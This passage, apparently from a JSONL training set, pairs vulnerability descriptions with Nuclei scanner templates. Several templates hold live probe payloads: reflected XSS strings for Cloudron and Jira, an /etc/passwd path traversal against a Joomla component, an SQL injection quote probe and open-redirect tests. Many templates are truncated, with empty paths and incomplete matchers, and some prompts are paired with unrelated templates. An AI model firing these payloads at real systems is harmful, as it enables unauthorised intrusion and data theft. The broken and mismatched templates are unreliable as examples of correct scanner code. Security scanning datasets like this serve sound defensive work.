princechaddha\n severity: high\n description: Ensure that website index (main) page suffix and error (404 not found) page are defined for your Google Cloud Storage buckets with static website configuration. Specifying these configurations ensures proper functionality and user experience for websites hosted on Cloud Storage buckets.\n tags: cloud,devops,gcp,gcloud,google-cloud-storage,website-config,static-website,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "gcloud-bucket-website-config-not-defined"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: airflow-default-login\n\ninfo:\n name: Apache Airflow Default Login\n author: pdteam\n severity: high\n description: Apache Airflow default login credentials were discovered.\n tags: airflow,default-login,apache,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - type: word\n words:\n - \"You should be redirected automatically to target URL: <a href=\"/\">\"", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for CVE-2021-40868", "input": "Title: Cross-Site Scripting (XSS) in cloudron cloudron\nSummary: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: cloudron cloudron\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-40868\n\ninfo:\n name: Cloudron 6.2 Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.\n tags: cve2021,cve,xss,cloudron,packetstorm,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: word\n words:\n - \"</script><script>alert(document.domain)</script>\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-40868"} {"instruction": "Generate a Nuclei template for CVE-2018-1273", "input": "Title: Code Injection in pivotal_software spring_data_commons and others\nSummary: Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, and older unsupported versions, contain a property binder vulnerability caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: pivotal_software spring_data_commons, pivotal_software spring_data_rest, apache ignite\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-1273\n\ninfo:\n name: Spring Data Commons - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,\nand older unsupported versions, contain a property binder vulnerability\ncaused by improper neutralization of special elements.\nAn unauthenticated remote malicious user (or attacker) can supply\nspecially crafted request parameters against Spring Data REST backed HTTP resources\nor using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.\n tags: cve,cve2018,vmware,rce,spring,kev,pivotal_software,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n condition: or", "category": "cve", "severity": "critical", "id": "CVE-2018-1273"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: web-file-manager\n\ninfo:\n name: Web File Manager Login Panel - Detect\n author: DhiyaneshDK\n severity: info\n description: Web File Manager login panel was detected.\n tags: panel,filemanager,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Login\" \n matchers:\n - type: word\n words:\n - \"Web File Manager\" \n - \"Login\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2025-47812", "input": "Title: Vulnerability (CWE-158) in wftpserver wing_ftp_server\nSummary: In Wing FTP Server before 7.4.4. the user and admin web interfaces mishandle '\\0' bytes, ultimately allowing injection of arbitrary Lua code into user session files. This can be used to execute arbitrary system commands with the privileges of the FTP service (root or SYSTEM by default). This is thus a remote code execution vulnerability that guarantees a total server compromise. This is also exploitable via anonymous FTP accounts.\nVulnerability Type: Vulnerability (CWE-158)\nSeverity: critical\nAffected Products: wftpserver wing_ftp_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-47812\n\ninfo:\n name: Wing FTP Server <= 7.4.3 - Remote Code Execution\n author: rcesecurity,4m3rr0r\n severity: critical\n description: Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) flaw (CVE-2025-47812).\nThe vulnerability arises from improper NULL byte handling in the 'username' parameter during login, which allows Lua code injection\ninto session files. These injected session files are executed when accessing authenticated endpoints such as /dir.html, resulting\nin arbitrary command execution with elevated privileges. This attack is possible only when anonymous login is enabled on the server.\n tags: cve,cve2025,rce,wingftp,ftp,unauth,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2025-47812"} {"instruction": "Generate a Nuclei template for CVE-2019-3402", "input": "Title: Cross-Site Scripting (XSS) in atlassian jira and others\nSummary: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: atlassian jira, atlassian jira_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-3402\n\ninfo:\n name: Jira < 8.1.1 - Cross-Site Scripting\n author: pdteam\n severity: medium\n description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.\n tags: cve,cve2019,atlassian,jira,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search\" \n matchers:\n - type: word\n words:\n - \"'<script>alert(1)</script>' does not exist\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2019-3402"} {"instruction": "Generate a Nuclei template for: Hunter API Test", "input": "Title: Hunter API Test\nSummary: Hunter API Test. API for domain search, professional email finder, author finder and email verifier\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-hunter\n\ninfo:\n name: Hunter API Test\n author: daffainfo\n severity: info\n description: API for domain search, professional email finder, author finder and email verifier\n tags: token-spray,hunter\n\nhttp:\n - method: GET\n path:\n - \"https://api.hunter.io/v2/domain-search?domain=stripe.com&api_key={{token}}\" \n matchers:\n - type: word\n words:\n - \"\"domain\"\" \n - \"\"disposable\"\" \n - \"\"webmail\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-hunter"} {"instruction": "Generate a Nuclei template for: CubeBackup Setup Page - Exposure", "input": "Title: CubeBackup Setup Page - Exposure\nSummary: CubeBackup Setup Page - Exposure. Detects exposed CubeBackup Setup page.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: cubebackup-setup-installer\n\ninfo:\n name: CubeBackup Setup Page - Exposure\n author: DhiyaneshDK\n severity: high\n description: Detects exposed CubeBackup Setup page.\n tags: misconfig,install,exposure,cubebackup,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"CubeBackup setup\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "cubebackup-setup-installer"} {"instruction": "Generate a Nuclei template for: Teamwork Takeover Detection", "input": "Title: Teamwork Takeover Detection\nSummary: Teamwork Takeover Detection. Teamwork takeover was detected.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: teamwork-takeover\n\ninfo:\n name: Teamwork Takeover Detection\n author: pdteam\n severity: high\n description: Teamwork takeover was detected.\n tags: takeover,teamwork,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"Oops - We didn't find your site.\"", "category": "generic", "severity": "high", "id": "teamwork-takeover"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: pypicloud-panel\n\ninfo:\n name: PyPICloud Login Panel - Detect\n author: Supras\n severity: info\n description: PyPLCloud login panel was detected.\n tags: panel,pypicloud,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"<title>Pypicloud\" \n - \"\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Passbolt Login Panel", "input": "Title: Passbolt Login Panel\nSummary: Passbolt Login Panel. Passbolt login panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: passbolt-panel\n\ninfo:\n name: Passbolt Login Panel\n author: righettod\n severity: info\n description: Passbolt login panel was detected.\n tags: panel,passbolt,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/login\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "passbolt-panel"} {"instruction": "Generate a Nuclei template for CVE-2010-0985", "input": "Title: Path Traversal in chris_simon com_abbrev\nSummary: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE: some of these details are obtained from third party information.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: chris_simon com_abbrev\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-0985\n\ninfo:\n name: Joomla! Component com_abbrev - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n tags: cve,cve2010,joomla,lfi,edb,chris_simon,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2010-0985"} {"instruction": "Generate a Nuclei template for CVE-2019-9879", "input": "Title: Vulnerability (CWE-306) in wpengine wpgraphql\nSummary: The WPGraphQL 0.2.3 plugin for WordPress allows remote attackers to register a new user with admin privileges, whenever new user registrations are allowed. This is related to the registerUser mutation.\nVulnerability Type: Vulnerability (CWE-306)\nSeverity: critical\nAffected Products: wpengine wpgraphql\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-9879\n\ninfo:\n name: WPGraphQL 0.2.3 - User Creation\n author: DhiyaneshDk\n severity: critical\n description: The WPGraphQL 0.2.3 plugin for WordPress allows remote attackers to register a new user with admin privileges, whenever new user registrations are allowed. This is related to the registerUser mutation.\n tags: cve,cve2019,wp-graphql,wpengine,wordpress,wp-plugin,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2019-9879"} {"instruction": "Generate a Nuclei template for: DigitalOcean Personal Access Token", "input": "Title: DigitalOcean Personal Access Token\nSummary: DigitalOcean Personal Access Token. Tags: file, keys, digitalocean\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: digitalocean-personal-access\n\ninfo:\n name: DigitalOcean Personal Access Token\n author: DhiyaneshDK\n severity: info\n description: DigitalOcean Personal Access Token\n tags: file,keys,digitalocean,token\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "digitalocean-personal-access"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: slurm-hpc-dashboard\n\ninfo:\n name: Slurm HPC Dashboard - Detect\n author: ritikchaddha\n severity: medium\n description: Slurm HPC Dashboard was detected.\n tags: misconfig,slurm,dashboard,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/slurm/\" \n matchers:\n - type: word\n words:\n - \"Slurm HPC Dashboard\" \n - \"content=\"Slurm HPC dashboard\" \n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2017-18566", "input": "Title: Cross-Site Scripting (XSS) in bestwebsoft user_role\nSummary: The user-role plugin before 1.5.6 for WordPress has multiple XSS issues.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: bestwebsoft user_role\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-18566\n\ninfo:\n name: User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: The user-role plugin before 1.5.6 for WordPress has multiple XSS issues.\n tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated,bestwebsoft,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2017-18566"} {"instruction": "Generate a Nuclei template for: Graylog Login Panel - Detect", "input": "Title: Graylog Login Panel - Detect\nSummary: Graylog Login Panel - Detect. Graylog login panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: graylog-panel\n\ninfo:\n name: Graylog Login Panel - Detect\n author: righettod\n severity: info\n description: Graylog login panel was detected.\n tags: panel,graylog,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "graylog-panel"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: meet-me\n\ninfo:\n name: Meet me User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Meet me user name information check was conducted.\n tags: osint,osint-dating,meet-me,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.meetme.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Meet people like \" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2022-4050", "input": "Title: Unknown Vulnerability in beardev joomsport\nSummary: The JoomSport WordPress plugin before 5.2.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: beardev joomsport\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-4050\n\ninfo:\n name: WordPress JoomSport <5.2.8 - SQL Injection\n author: theamanrawat\n severity: critical\n description: WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n tags: time-based-sqli,cve,cve2022,wpscan,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth,beardev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2022-4050"} {"instruction": "Generate a Nuclei template for: Redirection Detection", "input": "Title: Redirection Detection\nSummary: Redirection Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-redirection\n\ninfo:\n name: Redirection Detection\n author: ricardomaia\n severity: info\n description: Redirection Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/redirection/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-redirection"} {"instruction": "Generate a Nuclei template for CVE-2024-5334", "input": "Title: Vulnerability (CWE-73) in stitionai devika\nSummary: A local file read vulnerability exists in the stitionai/devika repository, affecting the latest version. The vulnerability is due to improper handling of the 'snapshot_path' parameter in the '/api/get-browser-snapshot' endpoint. An attacker can exploit this vulnerability by crafting a request with a malicious 'snapshot_path' parameter, leading to arbitrary file read from the system. This issue impacts the security of the application by allowing unauthorized access to sensitive files on the server.\nVulnerability Type: Vulnerability (CWE-73)\nSeverity: high\nAffected Products: stitionai devika\nIndicators: unauthorized", "output": "id: CVE-2024-5334\n\ninfo:\n name: Devika - Local File Inclusion\n author: nechyo,nukunga,harksu,olfloralo,gy741\n severity: high\n description: A local file read vulnerability exists in the stitionai/devika repository, affecting the latest version. The vulnerability is due to improper handling of the 'snapshot_path' parameter in the '/api/get-browser-snapshot' endpoint. An attacker can exploit this vulnerability by crafting a request with a malicious 'snapshot_path' parameter, leading to arbitrary file read from the system. This issue impacts the security of the application by allowing unauthorized access to sensitive files on the server.\n tags: cve,cve2024,devika-ai,lfi,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"attachment; filename=passwd\" \n - \"application/octet-stream\" \n part: header\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-5334"} {"instruction": "Generate a Nuclei template for CVE-2024-54330", "input": "Title: Vulnerability (CWE-918) in CVE-2024-54330\nSummary: Server-Side Request Forgery (SSRF) vulnerability in Hep Hep Hurra (HHH) Hurrakify allows Server Side Request Forgery.This issue affects Hurrakify: from n/a through 2.4.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: high\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-54330\n\ninfo:\n name: Hurrakify <= 2.4 - Server-Side Request Forgery\n author: s4e-io\n severity: high\n description: The Hurrakify plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.\n tags: cve,cve2024,wordpress,wp-plugin,hurrakify,ssrf,oob,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: word\n words:\n - \"text/html\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-54330"} {"instruction": "Generate a Nuclei template for CVE-2020-9043", "input": "Title: Information Disclosure in wpcentral wpcentral\nSummary: The wpCentral plugin before 1.5.1 for WordPress allows disclosure of the connection key.\nVulnerability Type: Information Disclosure\nSeverity: high\nAffected Products: wpcentral wpcentral\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-9043\n\ninfo:\n name: WordPress wpCentral <1.5.1 - Information Disclosure\n author: scent2d\n severity: high\n description: WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2020-9043"} {"instruction": "Generate a Nuclei template for CVE-2021-41291", "input": "Title: Path Traversal in ecoa ecs_router_controller-ecs_firmware and others\nSummary: ECOA BAS controller suffers from a path traversal content disclosure vulnerability. Using the GET parameter in File Manager, unauthenticated attackers can remotely disclose directory content on the affected device.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: ecoa ecs_router_controller-ecs_firmware, ecoa riskbuster_firmware, ecoa riskterminator\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-41291\n\ninfo:\n name: ECOA Building Automation System - Directory Traversal Content Disclosure\n author: gy741\n severity: high\n description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device\n tags: cve2021,cve,ecoa,lfi,traversal,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex", "category": "cve", "severity": "high", "id": "CVE-2021-41291"} {"instruction": "Generate a Nuclei template for CVE-2013-2621", "input": "Title: Vulnerability (CWE-601) in telaen_project telaen\nSummary: Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: telaen_project telaen\nIndicators: error, vulnerability detected", "output": "id: CVE-2013-2621\n\ninfo:\n name: Telaen => v1.3.1 - Open Redirect\n author: ctflearner\n severity: medium\n description: Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.\n tags: cve2013,cve,telaen,redirect,telaen_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/telaen/redir.php?https://interact.sh\" \n - \"{{BaseURL}}/redir.php?https://interact.sh\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2013-2621"} {"instruction": "Generate a Nuclei template for CVE-2023-47253", "input": "Title: Vulnerability (CWE-77) in qualitor qualitor\nSummary: Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter.\nVulnerability Type: Vulnerability (CWE-77)\nSeverity: critical\nAffected Products: qualitor qualitor\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-47253\n\ninfo:\n name: Qualitor <= 8.20 - Remote Code Execution\n author: s4e-io\n severity: critical\n description: Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter.\n tags: cve,cve2023,rce,qualitor,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-47253"} {"instruction": "Generate a Nuclei template for CVE-2023-47643", "input": "Title: Information Disclosure in salesagility suitecrm\nSummary: SuiteCRM is a Customer Relationship Management (CRM) software application. Prior to version 8.4.2, Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions. An attacker can obtain the GraphQL schema and understand the entire attack surface of the API, including sensitive fields such as UserHash. This issue is patched in version 8.4.2. There are no known workarounds.\nVulnerability Type: Information Disclosure\nSeverity: low\nAffected Products: salesagility suitecrm\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-47643\n\ninfo:\n name: SuiteCRM Unauthenticated Graphql Introspection\n author: isacaya\n severity: medium\n description: Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n tags: cve,cve2023,graphql,suitecrm,introspection,salesagility,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"userHash\" \n - \"authenticateId\" \n - \"systemGeneratedPassword\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "low", "id": "CVE-2023-47643"} {"instruction": "Generate a Nuclei template for: PageCDN API Test", "input": "Title: PageCDN API Test\nSummary: PageCDN API Test. Public API for javascript, css and font libraries on PageCDN\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-pagecdn\n\ninfo:\n name: PageCDN API Test\n author: daffainfo\n severity: info\n description: Public API for javascript, css and font libraries on PageCDN\n tags: token-spray,pagecdn\n\nhttp:\n - method: GET\n path:\n - \"https://pagecdn.com/api/v2/private/account/info?apikey={{token}}\" \n matchers:\n - type: word\n words:\n - \"\"username\"\" \n - \"\"email\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-pagecdn"} {"instruction": "Generate a Nuclei template for CVE-2022-30512", "input": "Title: SQL Injection in school_dormitory_management_system_project school_dormitory_management_system\nSummary: School Dormitory Management System 1.0 is vulnerable to SQL Injection via accounts/payment_history.php:31.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: school_dormitory_management_system_project school_dormitory_management_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-30512\n\ninfo:\n name: School Dormitory Management System 1.0 - SQL Injection\n author: tess\n severity: critical\n description: School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n tags: cve,cve2022,sqli,school_dormitory_management_system_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27\" \n matchers:\n - type: word\n words:\n - \"Fatal error\" \n - \"Uncaught Error: Call to a member function fetch_assoc()\" \n - \"<th class=\"\">Month of</th>\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-30512"} {"instruction": "Generate a Nuclei template for: RDS Automated Backup Check", "input": "Title: RDS Automated Backup Check\nSummary: RDS Automated Backup Check. Ensure that your Amazon RDS database instances have automated backups enabled for point-in-time recovery.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: rds-backup-enable\n\ninfo:\n name: RDS Automated Backup Check\n author: princechaddha\n severity: high\n description: Ensure that your Amazon RDS database instances have automated backups enabled for point-in-time recovery.\n tags: cloud,devops,aws,amazon,rds,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "rds-backup-enable"} {"instruction": "Generate a Nuclei template to detect Exposure of Resource to Wrong Sphere", "input": "Title: Exposure of Resource to Wrong Sphere (CWE-668)\nSummary: The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. Resources such as files and directories may be inadvertently exposed through mechanisms such as insecure permissions, or when a program accidentally operates on the wrong object. For example, a program may intend that private files can only be provided to a specific user. This effectively defines a control sphere that is intended to prevent attackers from accessing t\nVulnerability Type: Exposure of Resource to Wrong Sphere\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: office-webapps-panel\n\ninfo:\n name: Office Web Apps Server Panel - Detect\n author: DhiyaneshDK\n severity: info\n description: Microsoft Office Web App Login Panel was discovered.\n tags: panel,office-webapps,login,microsoft,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/op/generate.aspx\" \n - \"{{BaseURL}}/op/wrongfiletype.htm\" \n matchers:\n - type: word\n words:\n - \"Provide a link that opens Word\" \n - \"PowerPoint files in a web browser\" \n part: body\n condition: and\n - type: word\n words:\n - \"_OFUError\" \n - \"Wrong file type\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-668"} {"instruction": "Generate a Nuclei template for CVE-2021-39327", "input": "Title: Information Disclosure in ait-pro bulletproof_security\nSummary: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.\nVulnerability Type: Information Disclosure\nSeverity: medium\nAffected Products: ait-pro bulletproof_security\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-39327\n\ninfo:\n name: WordPress BulletProof Security 5.1 Information Disclosure\n author: geeknik\n severity: medium\n description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.\n tags: cve2021,cve,exposure,packetstorm,wordpress,ait-pro,vuln\n\nhttp:\n - method: 